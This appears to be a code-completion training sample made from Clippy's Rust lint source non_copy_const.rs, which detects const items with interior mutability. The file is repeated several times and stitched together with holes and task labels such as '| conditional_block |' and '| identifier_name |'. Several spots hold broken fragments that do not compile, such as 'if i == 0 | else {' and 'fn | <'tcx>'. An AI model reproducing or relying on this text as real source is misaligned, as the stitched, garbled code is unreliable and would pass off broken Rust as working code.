// `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
// I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
err == ErrorHandled::TooGeneric
},
|val| inner(cx, Const::from_value(cx.tcx, val, ty)),
)
}
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
let result = cx.tcx.const_eval_poly(body_id.hir_id.owner.to_def_id());
is_value_unfrozen_raw(cx, result, ty)
}
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
let substs = cx.typeck_results().node_substs(hir_id);
let result = cx.tcx.const_eval_resolve(
cx.param_env,
ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs),
None,
);
is_value_unfrozen_raw(cx, result, ty)
}
#[derive(Copy, Clone)]
enum Source {
Item { item: Span },
Assoc { item: Span },
Expr { expr: Span },
}
impl Source {
#[must_use]
fn lint(&self) -> (&'static Lint, &'static str, Span) {
match self {
Self::Item { item } | Self::Assoc { item, .. } => (
DECLARE_INTERIOR_MUTABLE_CONST,
"a `const` item should never be interior mutable",
*item,
),
Self::Expr { expr } => (
BORROW_INTERIOR_MUTABLE_CONST,
"a `const` item with interior mutability should not be borrowed",
*expr,
),
}
}
}
fn lint(cx: &LateContext<'_>, source: Source) {
let (lint, msg, span) = source.lint();
span_lint_and_then(cx, lint, span, msg, |diag| {
if span.from_expansion() {
return; // Don't give suggestions into macros.
}
match source {
Source::Item { .. } => {
let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
},
Source::Assoc { .. } => (),
Source::Expr { .. } => {
diag.help("assign this const to a local or static variable, and use the variable here");
},
}
});
}
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized)
// When there's no default value, lint it only according to its type;
// in other words, lint consts whose value *could* be unfrozen, not definitely is.
// This feels inconsistent with how the lint treats generic types,
// which avoids linting types which potentially become unfrozen.
// One could check whether an unfrozen type have a *frozen variant*
// (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
// and do the same as the case of generic types at impl items.
// Note that it isn't sufficient to check if it has an enum
// since all of that enum's variants can be unfrozen:
// i.e. having an enum doesn't necessary mean a type has a frozen variant.
// And, implementing it isn't a trivial task; it'll probably end up
// re-implementing the trait predicate evaluation specific to `Freeze`.
&& body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
{
lint(cx, Source::Assoc { item: trait_item.span });
}
}
}
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
}
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 | else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
}
| {
cx.typeck_results().expr_ty(dereferenced_expr)
} | conditional_block |
non_copy_const.rs | //! Checks for uses of const which the type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks for declaration of `const` items which is interior
/// mutable (e.g., contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` should better be replaced by a `static` item if a global
/// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
///
/// ### Known problems
/// A "non-constant" const item is a legacy way to supply an
/// initialized value to downstream `static` items (e.g., the
/// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
/// and this lint should be suppressed.
///
/// Even though the lint avoids triggering on a constant whose type has enums that have variants
/// with interior mutability, and its value uses non interior mutable variants (see
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
/// it complains about associated constants without default values only based on its types;
/// which might not be preferable.
/// There're other enums plus associated constants cases that the lint cannot handle.
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
///
/// // Bad.
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub DECLARE_INTERIOR_MUTABLE_CONST,
style,
"declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks if `const` items which is interior mutable (e.g.,
/// contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.) has been borrowed directly.
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` value should be stored inside a `static` item.
///
/// ### Known problems
/// When an enum has variants with interior mutability, use of its non
/// interior mutable variants can generate false positives. See issue
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
///
/// // Bad.
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub BORROW_INTERIOR_MUTABLE_CONST,
style,
"referencing `const` with interior mutability"
}
fn | <'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
fn is_value_unfrozen_raw<'tcx>(
cx: &LateContext<'tcx>,
result: Result<ConstValue<'tcx>, ErrorHandled>,
ty: Ty<'tcx>,
) -> bool {
fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
match val.ty.kind() {
// the fact that we have to dig into every structs to search enums
// leads us to the point checking `UnsafeCell` directly is the only option.
ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
let val = cx.tcx.destructure_const(cx.param_env.and(val));
val.fields.iter().any(|field| inner(cx, field))
},
_ => false,
}
}
result.map_or_else(
|err| {
// Consider `TooGeneric` cases as being unfrozen.
// This causes a false positive where an assoc const whose type is unfrozen
// have a value that is a frozen variant with a generic param (an example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
// However, it prevents a number of false negatives that is, I think, important:
// 1. assoc consts in trait defs referring to consts of themselves
// (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
// 2. a path expr referring to assoc consts whose type is doesn't have
// any frozen variants in trait defs (i.e. without substitute for `Self`).
// (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
// 3. similar to the false positive above;
// but the value is an unfrozen variant, or the type has no enums. (An example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
// and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
// One might be able to prevent these FNs correctly, and replace this with `false`;
// e.g. implementing `has_frozen_variant` described above, and not running this function
// when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
// case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
// similar to 2., but with the a frozen variant) (e.g. borrowing
// `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
// I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
err == ErrorHandled::TooGeneric
},
|val| inner(cx, Const::from_value(cx.tcx, val, ty)),
)
}
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
let result = cx.tcx.const_eval_poly(body_id.hir_id.owner.to_def_id());
is_value_unfrozen_raw(cx, result, ty)
}
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
let substs = cx.typeck_results().node_substs(hir_id);
let result = cx.tcx.const_eval_resolve(
cx.param_env,
ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs),
None,
);
is_value_unfrozen_raw(cx, result, ty)
}
#[derive(Copy, Clone)]
enum Source {
Item { item: Span },
Assoc { item: Span },
Expr { expr: Span },
}
impl Source {
#[must_use]
fn lint(&self) -> (&'static Lint, &'static str, Span) {
match self {
Self::Item { item } | Self::Assoc { item, .. } => (
DECLARE_INTERIOR_MUTABLE_CONST,
"a `const` item should never be interior mutable",
*item,
),
Self::Expr { expr } => (
BORROW_INTERIOR_MUTABLE_CONST,
"a `const` item with interior mutability should not be borrowed",
*expr,
),
}
}
}
fn lint(cx: &LateContext<'_>, source: Source) {
let (lint, msg, span) = source.lint();
span_lint_and_then(cx, lint, span, msg, |diag| {
if span.from_expansion() {
return; // Don't give suggestions into macros.
}
match source {
Source::Item { .. } => {
let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
},
Source::Assoc { .. } => (),
Source::Expr { .. } => {
diag.help("assign this const to a local or static variable, and use the variable here");
},
}
});
}
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized)
// When there's no default value, lint it only according to its type;
// in other words, lint consts whose value *could* be unfrozen, not definitely is.
// This feels inconsistent with how the lint treats generic types,
// which avoids linting types which potentially become unfrozen.
// One could check whether an unfrozen type have a *frozen variant*
// (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
// and do the same as the case of generic types at impl items.
// Note that it isn't sufficient to check if it has an enum
// since all of that enum's variants can be unfrozen:
// i.e. having an enum doesn't necessary mean a type has a frozen variant.
// And, implementing it isn't a trivial task; it'll probably end up
// re-implementing the trait predicate evaluation specific to `Freeze`.
&& body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
{
lint(cx, Source::Assoc { item: trait_item.span });
}
}
}
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
}
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 {
cx.typeck_results().expr_ty(dereferenced_expr)
} else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
}
| is_unfrozen | identifier_name |
non_copy_const.rs | //! Checks for uses of const which the type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks for declaration of `const` items which is interior
/// mutable (e.g., contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
///
/// ### Why is this bad? | ///
/// The `const` should better be replaced by a `static` item if a global
/// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
///
/// ### Known problems
/// A "non-constant" const item is a legacy way to supply an
/// initialized value to downstream `static` items (e.g., the
/// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
/// and this lint should be suppressed.
///
/// Even though the lint avoids triggering on a constant whose type has enums that have variants
/// with interior mutability, and its value uses non interior mutable variants (see
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
/// it complains about associated constants without default values only based on its types;
/// which might not be preferable.
/// There're other enums plus associated constants cases that the lint cannot handle.
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
///
/// // Bad.
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub DECLARE_INTERIOR_MUTABLE_CONST,
style,
"declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks if `const` items which is interior mutable (e.g.,
/// contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.) has been borrowed directly.
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` value should be stored inside a `static` item.
///
/// ### Known problems
/// When an enum has variants with interior mutability, use of its non
/// interior mutable variants can generate false positives. See issue
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
///
/// // Bad.
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub BORROW_INTERIOR_MUTABLE_CONST,
style,
"referencing `const` with interior mutability"
}
fn is_unfrozen<'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
fn is_value_unfrozen_raw<'tcx>(
cx: &LateContext<'tcx>,
result: Result<ConstValue<'tcx>, ErrorHandled>,
ty: Ty<'tcx>,
) -> bool {
fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
match val.ty.kind() {
// the fact that we have to dig into every structs to search enums
// leads us to the point checking `UnsafeCell` directly is the only option.
ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
let val = cx.tcx.destructure_const(cx.param_env.and(val));
val.fields.iter().any(|field| inner(cx, field))
},
_ => false,
}
}
result.map_or_else(
|err| {
// Consider `TooGeneric` cases as being unfrozen.
// This causes a false positive where an assoc const whose type is unfrozen
// have a value that is a frozen variant with a generic param (an example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
// However, it prevents a number of false negatives that is, I think, important:
// 1. assoc consts in trait defs referring to consts of themselves
// (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
// 2. a path expr referring to assoc consts whose type is doesn't have
// any frozen variants in trait defs (i.e. without substitute for `Self`).
// (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
// 3. similar to the false positive above;
// but the value is an unfrozen variant, or the type has no enums. (An example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
// and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
// One might be able to prevent these FNs correctly, and replace this with `false`;
// e.g. implementing `has_frozen_variant` described above, and not running this function
// when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
// case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
// similar to 2., but with the a frozen variant) (e.g. borrowing
// `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
// I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
err == ErrorHandled::TooGeneric
},
|val| inner(cx, Const::from_value(cx.tcx, val, ty)),
)
}
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
let result = cx.tcx.const_eval_poly(body_id.hir_id.owner.to_def_id());
is_value_unfrozen_raw(cx, result, ty)
}
